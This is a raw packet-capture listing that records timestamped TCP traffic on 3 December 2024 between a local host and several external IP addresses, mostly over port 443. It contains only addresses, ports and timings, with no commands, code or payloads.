                                                                        Dec 3, 2024 17:49:39.882009029 CET49756443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:49:39.882040024 CET4434975620.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:49:39.882488966 CET4434975620.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:49:39.930203915 CET49756443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:49:40.602869987 CET49758443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:40.602910995 CET44349758103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:40.602986097 CET49758443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:40.603630066 CET49759443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:40.603677988 CET44349759103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:40.603737116 CET49759443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:40.603919029 CET49758443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:40.603928089 CET44349758103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:40.604151964 CET49759443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:40.604165077 CET44349759103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:41.225091934 CET49756443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:49:41.267358065 CET4434975620.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:49:41.788259983 CET4434975620.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:49:41.788325071 CET4434975620.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:49:41.788346052 CET4434975620.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:49:41.788386106 CET4434975620.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:49:41.788398981 CET49756443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:49:41.788429976 CET4434975620.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:49:41.788476944 CET4434975620.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:49:41.788518906 CET49756443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:49:41.788518906 CET49756443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:49:41.788549900 CET49756443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:49:41.807647943 CET4434975620.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:49:41.807734013 CET49756443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:49:41.807755947 CET4434975620.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:49:41.807898045 CET4434975620.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:49:41.807955980 CET49756443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:49:42.485852957 CET44349758103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:42.486128092 CET49758443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:42.486191988 CET44349758103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:42.487126112 CET44349758103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:42.487190962 CET49758443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:42.488176107 CET49758443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:42.488248110 CET44349758103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:42.488347054 CET49758443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:42.488363028 CET44349758103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:42.490572929 CET44349759103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:42.490757942 CET49759443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:42.490787029 CET44349759103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:42.492333889 CET44349759103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:42.492388964 CET49759443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:42.493347883 CET49759443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:42.493464947 CET44349759103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:42.528314114 CET49758443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:42.543268919 CET49759443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:42.543296099 CET44349759103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:42.589808941 CET49759443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:43.212551117 CET49756443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:49:43.212624073 CET4434975620.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:49:43.212656975 CET49756443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:49:43.212675095 CET4434975620.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:49:43.238487005 CET44349748142.250.181.100192.168.2.4
                                                                        Dec 3, 2024 17:49:43.238565922 CET44349748142.250.181.100192.168.2.4
                                                                        Dec 3, 2024 17:49:43.238615990 CET49748443192.168.2.4142.250.181.100
                                                                        Dec 3, 2024 17:49:43.442749977 CET44349758103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:43.442876101 CET44349758103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:43.442934990 CET49758443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:43.442949057 CET44349758103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:43.443013906 CET49758443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:43.444499016 CET49758443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:43.444535971 CET44349758103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:43.459913015 CET49748443192.168.2.4142.250.181.100
                                                                        Dec 3, 2024 17:49:43.459927082 CET44349748142.250.181.100192.168.2.4
                                                                        Dec 3, 2024 17:49:43.460113049 CET49759443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:43.463017941 CET49762443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:43.463036060 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:43.463107109 CET49762443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:43.463323116 CET49762443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:43.463332891 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:43.463716984 CET49763443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:43.463764906 CET44349763103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:43.464133978 CET49763443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:43.464314938 CET49763443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:43.464330912 CET44349763103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:43.507334948 CET44349759103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:44.075669050 CET44349759103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:44.076463938 CET44349759103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:44.076524973 CET49759443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:44.076545954 CET44349759103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:44.076596022 CET49759443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:44.082798958 CET49759443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:44.082827091 CET44349759103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:45.076951027 CET4972380192.168.2.4199.232.210.172
                                                                        Dec 3, 2024 17:49:45.198761940 CET8049723199.232.210.172192.168.2.4
                                                                        Dec 3, 2024 17:49:45.198843956 CET4972380192.168.2.4199.232.210.172
                                                                        Dec 3, 2024 17:49:45.300729036 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:45.301024914 CET49762443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:45.301037073 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:45.301217079 CET44349763103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:45.301386118 CET49763443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:45.301403999 CET44349763103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:45.301553965 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:45.301712990 CET44349763103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:45.301835060 CET49762443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:45.301901102 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:45.302067995 CET49763443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:45.302124977 CET44349763103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:45.302208900 CET49762443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:45.302264929 CET49763443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:45.343342066 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:45.347352028 CET44349763103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.266210079 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.289978027 CET44349763103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.294655085 CET44349763103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.294714928 CET44349763103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.294729948 CET44349763103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.294743061 CET49763443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:46.294802904 CET49763443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:46.295167923 CET49763443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:46.295187950 CET44349763103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.320137978 CET49762443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:46.320151091 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.368629932 CET49762443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:46.581460953 CET49767443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:46.581489086 CET44349767104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:46.581547022 CET49767443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:46.581703901 CET49767443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:46.581716061 CET44349767104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:46.639476061 CET49768443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:46.639486074 CET44349768103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.639544964 CET49768443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:46.639774084 CET49768443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:46.639784098 CET44349768103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.651537895 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.651552916 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.651570082 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.651577950 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.651611090 CET49762443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:46.651611090 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.651640892 CET49762443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:46.651647091 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.651658058 CET49762443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:46.696861029 CET49762443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:46.702266932 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.702280045 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.702353954 CET49762443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:46.702363014 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.702385902 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:46.702410936 CET49762443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:46.702445030 CET49762443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:46.724770069 CET49762443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:46.724778891 CET44349762103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:47.171591997 CET49769443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:47.171629906 CET44349769103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:47.171680927 CET49769443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:47.172645092 CET49769443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:47.172660112 CET44349769103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:47.217894077 CET49770443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:47.217927933 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:47.217989922 CET49770443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:47.218554974 CET49770443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:47.218564034 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:48.101583004 CET44349767104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:48.101886988 CET49767443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:48.101897955 CET44349767104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:48.103311062 CET44349767104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:48.103382111 CET49767443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:48.104646921 CET49767443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:48.104646921 CET49767443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:48.104731083 CET44349767104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:48.147777081 CET49767443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:48.147789001 CET44349767104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:48.194683075 CET49767443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:48.577449083 CET44349767104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:48.577621937 CET44349767104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:48.579046011 CET49767443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:48.579046965 CET49767443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:48.604739904 CET44349768103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:48.605122089 CET49768443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:48.605129957 CET44349768103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:48.606677055 CET44349768103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:48.606786966 CET49768443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:48.607345104 CET49768443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:48.607345104 CET49768443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:48.607439041 CET44349768103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:48.647800922 CET49768443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:48.647813082 CET44349768103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:48.697024107 CET49768443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:48.720597982 CET49771443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:48.720669031 CET44349771104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:48.720952988 CET49771443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:48.720952988 CET49771443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:48.721000910 CET44349771104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:48.882342100 CET49767443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:48.882354975 CET44349767104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:48.963001966 CET44349769103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:48.963392973 CET49769443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:48.963416100 CET44349769103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:48.963743925 CET44349769103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:48.964023113 CET49769443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:48.964071035 CET44349769103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:48.964153051 CET49769443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:48.976262093 CET49772443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:48.976299047 CET44349772103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:49:48.976367950 CET49772443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:48.976576090 CET49772443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:48.976584911 CET44349772103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:49:49.011342049 CET44349769103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:49.043921947 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:49.044181108 CET49770443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:49.044212103 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:49.045103073 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:49.045173883 CET49770443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:49.045481920 CET49770443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:49.045536995 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:49.045628071 CET49770443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:49.045635939 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:49.100908041 CET49770443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:49.568959951 CET44349768103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:49.593997002 CET44349768103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:49.594026089 CET44349768103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:49.594059944 CET44349768103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:49.594078064 CET44349768103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:49.594152927 CET49768443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:49.594254971 CET49768443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:49.594255924 CET44349768103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:49.594310999 CET49768443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:49.602236986 CET49768443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:49.602471113 CET44349768103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:49.602545023 CET49768443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:49.890151024 CET44349769103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:49.890352011 CET44349769103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:49.890430927 CET49769443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:49.890925884 CET49769443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:49.890949011 CET44349769103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:50.075215101 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:50.116524935 CET49770443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:50.116568089 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:50.163373947 CET49770443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:50.226742029 CET44349771104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:50.227058887 CET49771443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:50.227145910 CET44349771104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:50.228053093 CET44349771104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:50.228125095 CET49771443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:50.228542089 CET49771443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:50.228601933 CET44349771104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:50.228694916 CET49771443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:50.228713036 CET44349771104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:50.272768974 CET49771443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:50.370734930 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:50.370742083 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:50.370781898 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:50.370800972 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:50.370803118 CET49770443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:50.370827913 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:50.370855093 CET49770443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:50.370862961 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:50.370872974 CET49770443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:50.387022018 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:50.387057066 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:50.387079954 CET49770443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:50.387088060 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:50.387100935 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:50.387126923 CET49770443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:50.387156010 CET49770443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:50.387407064 CET49770443192.168.2.4103.160.107.138
                                                                        Dec 3, 2024 17:49:50.387422085 CET44349770103.160.107.138192.168.2.4
                                                                        Dec 3, 2024 17:49:50.714090109 CET44349771104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:50.714169025 CET44349771104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:50.714248896 CET49771443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:50.715172052 CET49771443192.168.2.4104.26.12.205
                                                                        Dec 3, 2024 17:49:50.715198994 CET44349771104.26.12.205192.168.2.4
                                                                        Dec 3, 2024 17:49:51.399352074 CET44349772103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:49:51.399641037 CET49772443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:51.399661064 CET44349772103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:49:51.401129007 CET44349772103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:49:51.401187897 CET49772443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:51.402245045 CET49772443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:51.402322054 CET44349772103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:49:51.402445078 CET49772443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:51.402451992 CET44349772103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:49:51.444772005 CET49772443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:51.965646029 CET44349772103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:49:51.965754986 CET44349772103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:49:51.965812922 CET49772443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:51.967047930 CET49772443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:51.967067003 CET44349772103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:49:52.147496939 CET49773443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:52.147537947 CET44349773103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:49:52.147655010 CET49773443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:52.147840023 CET49773443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:52.147852898 CET44349773103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:49:53.868896008 CET44349773103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:49:53.869179964 CET49773443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:53.869203091 CET44349773103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:49:53.870264053 CET44349773103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:49:53.870330095 CET49773443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:53.870685101 CET49773443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:53.870745897 CET44349773103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:49:53.870850086 CET49773443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:53.870857954 CET44349773103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:49:53.912756920 CET49773443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:54.701817036 CET44349773103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:49:54.701904058 CET44349773103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:49:54.701967001 CET49773443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:54.702975035 CET49773443192.168.2.4103.126.138.87
                                                                        Dec 3, 2024 17:49:54.702996016 CET44349773103.126.138.87192.168.2.4
                                                                        Dec 3, 2024 17:50:19.826689005 CET49774443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:50:19.826744080 CET4434977420.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:50:19.826884985 CET49774443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:50:19.827936888 CET49774443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:50:19.827946901 CET4434977420.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:50:20.758135080 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:20.758179903 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:20.758274078 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:20.758675098 CET49775443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:50:20.758686066 CET4434977513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:50:21.534226894 CET4434977420.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:50:21.534377098 CET49774443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:50:21.537739992 CET49774443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:50:21.537763119 CET4434977420.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:50:21.538033009 CET4434977420.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:50:21.545419931 CET49774443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:50:21.591348886 CET4434977420.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:50:22.225292921 CET4434977420.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:50:22.225322008 CET4434977420.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:50:22.225337029 CET4434977420.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:50:22.225490093 CET49774443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:50:22.225529909 CET4434977420.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:50:22.225589991 CET49774443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:50:22.263016939 CET4434977420.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:50:22.263086081 CET4434977420.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:50:22.263122082 CET49774443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:50:22.263135910 CET4434977420.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:50:22.263164043 CET49774443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:50:22.263173103 CET4434977420.109.210.53192.168.2.4
                                                                        Dec 3, 2024 17:50:22.263221979 CET49774443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:50:22.263375044 CET49774443192.168.2.420.109.210.53
                                                                        Dec 3, 2024 17:50:22.263396978 CET4434977420.109.210.53192.168.2.4
